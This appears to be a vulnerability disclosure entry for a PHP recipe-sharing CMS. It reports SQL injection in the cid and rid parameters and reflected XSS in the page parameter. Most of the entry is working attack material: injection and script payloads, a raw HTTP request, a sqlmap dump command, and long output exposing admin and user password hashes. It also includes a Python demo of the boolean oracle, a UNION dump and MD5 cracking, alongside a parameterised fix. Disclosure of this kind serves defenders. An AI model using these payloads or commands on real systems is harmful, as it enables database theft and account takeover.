Attacker Value: Very High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: Unknown
Privileges Required: Unknown
Attack Vector: Unknown

CVE-nu11-17-092921

Last updated September 29, 2021
MITRE ATT&CK tactics: Defense Evasion (validated); Execution (validated)

Description

SQL Injection Description:
The cid parameter of Recipe Sharing Website – CMS (by oretnom23) is vulnerable to SQL injection. The payloads 12345678' or '7775'='7775 and 77335599' or '5533'='5577 were each submitted in the cid parameter. The two requests produced different responses (the first appended condition is always true, the second always false), which indicates that the input is incorporated into a SQL query without parameterisation. The back-end database is SQLite, not MySQL: the application's own PHP warnings (SQLite3::exec()) and the sqlmap fingerprint in the analysis below both identify it. An attacker can dump the admin_list table, including usernames and password hashes, and use the recovered credentials to take over accounts. The dumped hashes are 32 hexadecimal characters with no visible salt, consistent with plain MD5, so they are cheap to crack offline.

XSS Vulnerability Description:
The value of the page request parameter is copied into the HTML document as text between the TITLE tags. The payload n0gg2</title><script>alert(1)</script>pfcjm was submitted in the page parameter and was echoed unmodified in the response, so the injected </title> closes the element and the script executes in the victim's browser (reflected XSS). Because the application identifies users by the PHPSESSID cookie, an attacker who lures a logged-in user to a crafted link can use the injected script to read that cookie, if it is not marked HttpOnly, or to issue requests inside the victim's session, and so hijack the account. The captured response on this page does not include a Set-Cookie header, so the cookie's flags cannot be confirmed from it.

Technical Analysis

SQL Injection (cid parameter of page=recipe; sqlmap below confirms the same flaw in the rid parameter of page=view_recipe):

The payloads 12345678' or '7775'='7775 and 77335599' or '5533'='5577 were each submitted in the cid parameter and produced different responses, the boolean-based signal that the value is concatenated into the query rather than bound as data. The back end is SQLite (see the SQLite3::exec() warnings in the response and the sqlmap fingerprint below), and the injection can be driven to a full dump of admin_list, including the password hashes needed to take over accounts.
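The boolean oracle, the UNION dump and the hash cracking described above, as an added example that is not code from the page or from the CMS. The database is an in-memory SQLite stand-in built from the admin_list rows in the sqlmap dump below; the query functions are a hypothetical reconstruction of the unsafe pattern next to a parameterised version, and the UNION payload uses a single column rather than the 11 NULL placeholders sqlmap needed against the real endpoint.

```python
import hashlib
import sqlite3


def build_db():
    # Constructed in-memory stand-in for the CMS database. admin_list follows
    # the sqlmap dump on this page; recipe_list keeps only the columns needed.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE admin_list (
            admin_id INTEGER PRIMARY KEY, type INTEGER, status INTEGER,
            fullname TEXT, password TEXT, username TEXT, date_created TEXT);
        CREATE TABLE recipe_list (
            recipe_id INTEGER PRIMARY KEY, category_id INTEGER, title TEXT);
        INSERT INTO admin_list VALUES
            (1, 1, 1, 'Administrator', '0192023a7bbd73250516f069df18b500', 'admin', '2021-09-28 01:54:24'),
            (2, 2, 1, 'Mike Williams', 'a88df23ac492e6e2782df6586a0c645f', 'mwilliams', '2021-09-28 08:00:51');
        INSERT INTO recipe_list VALUES (1, 4, 'Sample Menu'), (2, 3, 'Sample Recipe 102');
    """)
    return con


def recipes_by_category_vulnerable(con, cid):
    # Hypothetical reconstruction of the unsafe pattern the page's evidence
    # implies: the request value is spliced straight into the SQL text.
    sql = f"SELECT title FROM recipe_list WHERE category_id = '{cid}'"
    return sorted(r[0] for r in con.execute(sql))


def recipes_by_category_fixed(con, cid):
    # Parameterised statement: the value is bound as data and cannot change
    # the query's structure, whatever quotes or keywords it contains.
    sql = "SELECT title FROM recipe_list WHERE category_id = ?"
    return sorted(r[0] for r in con.execute(sql, (cid,)))


# The two probes from the page: a tautology and a contradiction.
TRUE_PROBE = "12345678' or '7775'='7775"
FALSE_PROBE = "77335599' or '5533'='5577"


def boolean_oracle(query_fn, con):
    # True when the two probes yield different results, i.e. the parameter is
    # interpreted as SQL rather than as data. This is the page's detection step.
    return query_fn(con, TRUE_PROBE) != query_fn(con, FALSE_PROBE)


def dump_admins_via_union(con):
    # Single-column UNION that appends admin_list rows to the recipe result set.
    # The trailing "-- " comments out the quote the application adds.
    payload = "-1' UNION ALL SELECT username || ':' || password FROM admin_list-- "
    return recipes_by_category_vulnerable(con, payload)


def crack_md5(hashes, candidates):
    # The dumped passwords are 32 hex characters with no salt, so a lookup
    # table over a candidate list reverses any that appear in the list.
    table = {hashlib.md5(c.encode()).hexdigest(): c for c in candidates}
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    db = build_db()
    print("vulnerable oracle:", boolean_oracle(recipes_by_category_vulnerable, db))
    print("fixed oracle:", boolean_oracle(recipes_by_category_fixed, db))
    print("union dump:", dump_admins_via_union(db))
    hashes = [row.split(":")[1] for row in dump_admins_via_union(db)]
    print(crack_md5(hashes, ["password", "123456", "admin", "admin123"]))
```

The fixed function returns the same empty result for both probes because SQLite compares the bound string against the integer column as a value, never as SQL, which is why the oracle goes quiet once the query is parameterised.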

  • Request (boolean-based SQL injection, the always-true payload in the cid parameter):
GET /recipe_site/?page=recipe&cid=12345678'%20or%20'7775'%3d'7775 HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/recipe_site/
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
  • Response (the PHP warnings at the top disclose the SQLite back end and the absolute path of DBConnection.php on disk; the rest of the page renders normally because the injected condition is true):
HTTP/1.1 200 OK
Date: Wed, 29 Sep 2021 07:50:44 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13306

<br />
<b>Warning</b>: SQLite3::exec(): database is locked in <b>C:\xampp\htdocs\recipe_site\DBConnection.php</b> on line <b>76</b><br />
<br />
<b>Warning</b>: SQLite3::exec(): database is locked i
...[SNIP]...
<div class="item col wow bounceInUp">
...[SNIP]...
<div class="card shadow-sm ">
...[SNIP]...
<div class="card-body ">
...[SNIP]...
<h5 class="card-title mb-1">Sample Recipe 102</h5>
...[SNIP]...
<hr class="bg-primary opacity-100">
...[SNIP]...
<p class="truncate-3 fw-light fst-italic lh-1" title="Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur accumsan metus sit amet erat volutpat, pl
...[SNIP]...
<div class="w-100 d-flex justify-content-end">
...[SNIP]...
<div class="col-auto flex-grow-1">
...[SNIP]...
<div class="text-muted truncate-1" title="Claire Blake">
...[SNIP]...
<div class="col-auto">
...[SNIP]...
<a href="./?page=view_recipe&rid=2" class="btn btn-sm btn-primary bg-gradient rounded-0 py-0">View Recipes</a>
...[SNIP]...
<div class="item col wow bounceInUp">
...[SNIP]...
<div class="card shadow-sm ">
...[SNIP]...
<div class="card-body ">
...[SNIP]...
<h5 class="card-title mb-1">Sample Menu</h5>
...[SNIP]...
<hr class="bg-primary opacity-100">
...[SNIP]...
<p class="truncate-3 fw-light fst-italic lh-1" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at
...[SNIP]...
<div class="w-100 d-flex justify-content-end">
...[SNIP]...
<div class="col-auto flex-grow-1">
...[SNIP]...
<div class="text-muted truncate-1" title="Try My Recipe Mgt">
...[SNIP]...
<div class="col-auto">
...[SNIP]...
<a href="./?page=view_recipe&rid=1" class="btn btn-sm btn-primary bg-gradient rounded-0 py-0">View Recipes</a>
...[SNIP]...
  • The PoC (sqlmap against the rid parameter of page=view_recipe, a second injection point distinct from the cid parameter shown above; sqlmap identifies rid as a GET parameter, so the --data values play no part in the injection):
python sqlmap.py -u "http://192.168.1.180/recipe_site/?page=view_recipe&rid=2" --data="username=PWNED&password=password" --cookie="PHPSESSID=v4f40h5nvo41f7t5j0jg8f7pvd" --batch --answers="crack=N,dict=N,continue=Y,quit=N" --dump
  • Output from the PoC:
---
Parameter: rid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=view_recipe&rid=2' AND 8223=8223 AND 'szHe'='szHe

    Type: time-based blind
    Title: SQLite > 2.0 AND time-based blind (heavy query)
    Payload: page=view_recipe&rid=2' AND 9766=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND 'pxtJ'='pxtJ

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: page=view_recipe&rid=-3970' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113,107,120,113,113)||CHAR(98,110,109,97,65,108,113,65,99,90,118,79,112,72,99,89,87,70,75,70,68,116,65,117,97,65,106,79,101,100,109,86,65,79,84,109,79,82,112,77)||CHAR(113,113,118,106,113),NULL,NULL,NULL,NULL-- Lafs
---
[15:54:52] [INFO] the back-end DBMS is SQLite
web application technology: PHP 7.4.22, Apache 2.4.48
back-end DBMS: SQLite
[15:54:52] [INFO] fetching tables for database: 'SQLite_masterdb'
[15:54:52] [INFO] fetching columns for table 'admin_list'
[15:54:52] [INFO] fetching entries for table 'admin_list'
[15:54:52] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] N
Database: <current>
Table: admin_list
[2 entries]
+----------+------+--------+---------------+----------------------------------+-----------+---------------------+
| admin_id | type | status | fullname      | password                         | username  | date_created        |
+----------+------+--------+---------------+----------------------------------+-----------+---------------------+
| 1        | 1    | 1      | Administrator | 0192023a7bbd73250516f069df18b500 | admin     | 2021-09-28 01:54:24 |
| 2        | 2    | 1      | Mike Williams | a88df23ac492e6e2782df6586a0c645f | mwilliams | 2021-09-28 08:00:51 |
+----------+------+--------+---------------+----------------------------------+-----------+---------------------+

[15:54:52] [INFO] table 'SQLite_masterdb.admin_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\admin_list.csv'
[15:54:52] [INFO] fetching columns for table 'comment_list'
[15:54:52] [INFO] fetching entries for table 'comment_list'
[15:54:52] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:54:52] [INFO] fetching number of entries for table 'comment_list' in database 'SQLite_masterdb'
[15:54:52] [INFO] resumed: 4
[15:54:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:54:52] [INFO] retrieved:
[15:54:52] [WARNING] time-based comparison requires larger statistical model, please wait..................... (done)
[15:54:53] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] resumed: 2021-09-28 05:58:39
[15:54:53] [INFO] resumed: This is only a sample comment 101
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] resumed: 3
[15:54:53] [INFO] resumed: 2021-09-28 06:26:59
[15:54:53] [INFO] resumed: Sample Comment 102
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] resumed: 6
[15:54:53] [INFO] resumed: 2021-09-28 07:32:49
[15:54:53] [INFO] resumed: Test User Comment 101
[15:54:53] [INFO] resumed: 2
[15:54:53] [INFO] resumed: 3
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] resumed: 7
[15:54:53] [INFO] resumed: 2021-09-28 07:34:03
[15:54:53] [INFO] resumed: test
[15:54:53] [INFO] resumed: 2
[15:54:53] [INFO] resumed: 1
Database: <current>
Table: comment_list
[4 entries]
+---------+-----------+------------+---------+-----------------------------------+---------------------+
| user_id | recipe_id | comment_id | FOREIGN | message                           | date_created        |
+---------+-----------+------------+---------+-----------------------------------+---------------------+
| 1       | 1         | 1          | <blank> | This is only a sample comment 101 | 2021-09-28 05:58:39 |
| 1       | 1         | 3          | <blank> | Sample Comment 102                | 2021-09-28 06:26:59 |
| 3       | 2         | 6          | <blank> | Test User Comment 101             | 2021-09-28 07:32:49 |
| 1       | 2         | 7          | <blank> | test                              | 2021-09-28 07:34:03 |
+---------+-----------+------------+---------+-----------------------------------+---------------------+

[15:54:53] [INFO] table 'SQLite_masterdb.comment_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\comment_list.csv'
[15:54:53] [INFO] fetching columns for table 'recipe_list'
[15:54:53] [INFO] fetching entries for table 'recipe_list'
[15:54:53] [INFO] fetching number of entries for table 'recipe_list' in database 'SQLite_masterdb'
[15:54:53] [INFO] resumed: 2
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] resumed: 4
[15:54:53] [INFO] resumed: 2021-09-28 03:14:26
[15:54:53] [INFO] resumed: &lt;p&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at lacinia. Donec in libero vitae nunc consequat vehicula ac et sem. Nulla ac lacus vitae augue porta congue at vitae ante. Suspendisse pulvinar eget nibh bibendum aliquam. Nulla rutrum sit amet mi et facilisis. Donec et odio augue. Cras elementum at sapien at suscipit. Nam sodales, velit nec congue mollis, ligula neque blandit eros, ac porta nibh lorem vel lacus.&lt;/span&gt;&lt;br&gt;&lt;/p&gt;
[15:54:53] [INFO] resumed: &lt;ul&gt;&lt;li&gt;sample&lt;/li&gt;&lt;li&gt;Test&lt;/li&gt;&lt;li&gt;ingredient 1&lt;/li&gt;&lt;li&gt;ingredient 2&lt;/li&gt;&lt;li&gt;ingredient 3&lt;/li&gt;&lt;li&gt;ingredient 4&lt;/li&gt;&lt;li&gt;ingredient 5&lt;/li&gt;&lt;li&gt;ingredient 6&lt;br&gt;&lt;/li&gt;&lt;/ul&gt;
[15:54:53] [INFO] resumed: &lt;p&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Aliquam nec sodales arcu. Integer posuere, eros ut imperdiet lacinia, orci mi sodales augue, eget pretium dolor nisi varius lorem. In metus diam, venenatis nec metus et, posuere mollis mauris.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;&lt;b&gt;Nutrition Facts&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Sample 101 5%&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Sample 102 20%&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Sample 103 25%&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Sample 104 25%&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Sample 105 5%&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Sample 106 5%&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Sample 107 15%&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] resumed: <ol><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Quisque ac euismod sem.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Cras aliquet dolor id lacinia pretium. Curabitur vitae dictum urna, sed viverra nisl. Aenean non finibus lacus. Pellentesque at ex ut augue pulvinar vestibulum at eu nibh.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Curabitur semper, elit sit amet consectetur suscipit, dui felis vulputate elit, eu lacinia tellus lorem in nunc. Pellentesque ac neque enim.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Maecenas at bibendum mauris, eu cursus enim. Vestibulum a efficitur velit, sit amet tincidunt tellus. Nam hendrerit justo metus, ac eleifend mauris egestas vitae.</span></li><li><span style=\\\\\\\\\\\\\\"font-family: \\\\\\"Open Sans\\\\\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\\\\\\\\\">Aliquam nec sodales arcu. Integer posuere, eros ut imperdiet lacinia, orci mi sodales augue, eget pretium dolor nisi varius lorem. In metus diam, venenatis nec metus et, posuere mollis mauris. Sed sodales nibh iaculis velit dignissim ultrices.<br></span><br></li></ol>
[15:54:53] [INFO] resumed: Sample Menu
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] retrieved:
[15:54:53] [INFO] resumed: 3
[15:54:53] [INFO] resumed: 2021-09-28 07:24:03
[15:54:53] [INFO] resumed: &lt;p&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur accumsan metus sit amet erat volutpat, placerat laoreet lorem tempus. Aenean eget convallis nisi. Duis id nisl ut urna fermentum commodo. Cras quis nulla lacus. Etiam et nulla non risus hendrerit tincidunt. Vestibulum efficitur odio in nibh ultrices laoreet.&lt;/span&gt;&lt;br&gt;&lt;/p&gt;
[15:54:53] [INFO] resumed: &lt;ul&gt;&lt;li&gt;Test 1&lt;/li&gt;&lt;li&gt;Test 2&lt;/li&gt;&lt;li&gt;Test 3&lt;/li&gt;&lt;li&gt;Test 4&lt;/li&gt;&lt;li&gt;Test 5&lt;/li&gt;&lt;li&gt;Test 6&lt;br&gt;&lt;/li&gt;&lt;/ul&gt;
[15:54:53] [INFO] resumed: &lt;p&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Integer ut quam congue, posuere ante vitae, vestibulum orci. Integer accumsan erat sed sagittis commodo. Nullam vulputate, libero quis venenatis vestibulum, ex enim pellentesque purus, quis gravida lectus tellus id justo. Integer elementum a lacus a vehicula. Sed sed purus a massa tincidunt mattis at non ligula.&amp;nbsp;&lt;/span&gt;&lt;br&gt;&lt;/p&gt;
[15:54:53] [INFO] resumed: 2
[15:54:53] [INFO] resumed: 1
[15:54:53] [INFO] resumed: <ol><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Maecenas aliquet nunc vitae risus condimentum accumsan. In blandit, sapien vitae tristique viverra, tortor est pretium quam, eget ultricies metus ipsum eget turpis.</span></li><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Morbi vitae hendrerit elit. Nulla ullamcorper dapibus ipsum sit amet convallis. Vestibulum ullamcorper mollis risus a ullamcorper. </span></li><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Sed consectetur mauris metus, sed interdum purus pretium gravida. Phasellus pulvinar fringilla fringilla. Lorem ipsum dolor sit amet, consectetur adipiscing elit.</span></li><li><span style=\\\\\\"font-family: \\"Open Sans\\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\\\\">Quisque vel sem dapibus, congue felis sit amet, sollicitudin odio. Vestibulum rhoncus semper diam quis aliquam. <br></span><br></li></ol>
[15:54:53] [INFO] resumed: Sample Recipe 102
[15:54:53] [INFO] resumed: 3
Database: <current>
Table: recipe_list
[2 entries]
Columns: user_id | recipe_id | category_id | step | title | status | FOREIGN | other_info | description | ingredients | date_created

Row 1 (the only row that survives in the captured output; the second entry is cut off):
  user_id      = 1
  recipe_id    = 1
  category_id  = 4
  title        = Sample Menu
  status       = 1
  FOREIGN      = <blank>
  date_created = 2021-09-28 03:14:26
  step         = the <ol> of rich-text steps retrieved at 15:54:53 above ("Quisque ac euismod sem." and following)
  other_info   = the entity-encoded <p>/<ul> block retrieved above ("Aliquam nec sodales arcu. ..." followed by the "Nutrition Facts" list, Sample 101 5% through Sample 107 15%)
  description  = the entity-encoded <p> block retrieved above ("Lorem ipsum dolor sit amet, ...")
  ingredients  = the entity-encoded <ul> retrieved above (sample, Test, ingredient 1 through ingredient 6)
| 3       | 2         | 3           | <ol><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Maecenas aliquet nunc vitae risus condimentum accumsan. In blandit, sapien vitae tristique viverra, tortor est pretium quam, eget ultricies metus ipsum eget turpis.</span></li><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Morbi vitae hendrerit elit. Nulla ullamcorper dapibus ipsum sit amet convallis. Vestibulum ullamcorper mollis risus a ullamcorper. </span></li><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Sed consectetur mauris metus, sed interdum purus pretium gravida. Phasellus pulvinar fringilla fringilla. Lorem ipsum dolor sit amet, consectetur adipiscing elit.</span></li><li><span style=\\\"font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: justify;\\\">Quisque vel sem dapibus, congue felis sit amet, sollicitudin odio. Vestibulum rhoncus semper diam quis aliquam. <br></span><br></li></ol>                                                                                                                                                                                                                                                                                                                                                                | Sample Recipe 102 | 1      | <blank> | &lt;p&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Integer ut quam congue, posuere ante vitae, vestibulum orci. Integer accumsan erat sed sagittis commodo. Nullam vulputate, libero quis venenatis vestibulum, ex enim pellentesque purus, quis gravida lectus tellus id justo. Integer elementum a lacus a vehicula. 
Sed sed purus a massa tincidunt mattis at non ligula.&amp;nbsp;&lt;/span&gt;&lt;br&gt;&lt;/p&gt;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                | &lt;p&gt;&lt;span style=&quot;font-family: &amp;quot;Open Sans&amp;quot;, Arial, sans-serif; font-size: 14px; text-align: justify;&quot;&gt;Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Etiam hendrerit tellus in nisi semper vulputate. Curabitur accumsan metus sit amet erat volutpat, placerat laoreet lorem tempus. Aenean eget convallis nisi. Duis id nisl ut urna fermentum commodo. Cras quis nulla lacus. Etiam et nulla non risus hendrerit tincidunt. 
Vestibulum efficitur odio in nibh ultrices laoreet.&lt;/span&gt;&lt;br&gt;&lt;/p&gt;                                                                                                                                                    | &lt;ul&gt;&lt;li&gt;Test 1&lt;/li&gt;&lt;li&gt;Test 2&lt;/li&gt;&lt;li&gt;Test 3&lt;/li&gt;&lt;li&gt;Test 4&lt;/li&gt;&lt;li&gt;Test 5&lt;/li&gt;&lt;li&gt;Test 6&lt;br&gt;&lt;/li&gt;&lt;/ul&gt;                                                                                         | 2021-09-28 07:24:03 |
+---------+-----------+-------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-------------------+--------+---------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+---------------------+

[15:54:53] [INFO] table 'SQLite_masterdb.recipe_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\recipe_list.csv'
[15:54:53] [INFO] fetching columns for table 'user_list'
[15:54:53] [INFO] fetching entries for table 'user_list'
[15:54:53] [INFO] recognized possible password hashes in column 'password'
do you want to crack them via a dictionary-based attack? [Y/n/q] N
Database: <current>
Table: user_list
[3 entries]
+---------+--------+-------------------+----------------------------------+----------+---------------------+
| user_id | status | fullname          | password                         | username | date_created        |
+---------+--------+-------------------+----------------------------------+----------+---------------------+
| 1       | 1      | Try My Recipe Mgt | 48280ea386fb6ce4e66d199fcf14b333 | mgt      | 2021-09-28 02:42:29 |
| 3       | 1      | Claire Blake      | 4744ddea876b11dcb1d169fadf494418 | cblake   | 2021-09-28 07:02:50 |
| 4       | 1      | John Smith        | 39ce7e2a8573b41ce73b5ba41617f8f7 | jsmith   | 2021-09-28 07:59:40 |
+---------+--------+-------------------+----------------------------------+----------+---------------------+

[15:54:53] [INFO] table 'SQLite_masterdb.user_list' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\192.168.1.180\dump\SQLite_masterdb\user_list.csv'
[15:54:53] [INFO] fetching columns for table 'category_list'
[15:54:53] [INFO] fetching entries for table 'category_list'
Database: <current>
Table: category_list
[4 entries]
+-------------+---------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| category_id | name    | description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |
+-------------+---------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1           | Vegies  | Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at lacinia. Donec in libero vitae nunc consequat vehicula ac et sem. Nulla ac lacus vitae augue porta congue at vitae ante. Suspendisse pulvinar eget nibh bibendum aliquam. Nulla rutrum sit amet mi et facilisis. Donec et odio augue. Cras elementum at sapien at suscipit. Nam sodales, velit nec congue mollis, ligula neque blandit eros, ac porta nibh lorem vel lacus. |
| 2           | Porks   | Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut vestibulum, magna sed porttitor venenatis, metus ex ornare arcu, non tincidunt orci lectus at odio. Proin elementum convallis leo at lacinia. Donec in libero vitae nunc consequat vehicula ac et sem. Nulla ac lacus vitae augue porta congue at vitae ante. Suspendisse pulvinar eget nibh bibendum aliquam. Nulla rutrum sit amet mi et facilisis. Donec et odio augue. Cras elementum at sapien at suscipit. Nam sodales, velit nec congue mollis, ligula neque blandit eros, ac porta nibh lorem vel lacus. |
| 3           | Beef    | In vehicula risus iaculis, placerat dolor a, accumsan elit. Phasellus vel sem in tellus maximus rutrum commodo non libero. Sed tincidunt libero elit, in commodo libero pulvinar lacinia.                                                                                                                                                                                                                                                                                                                                                                                    |
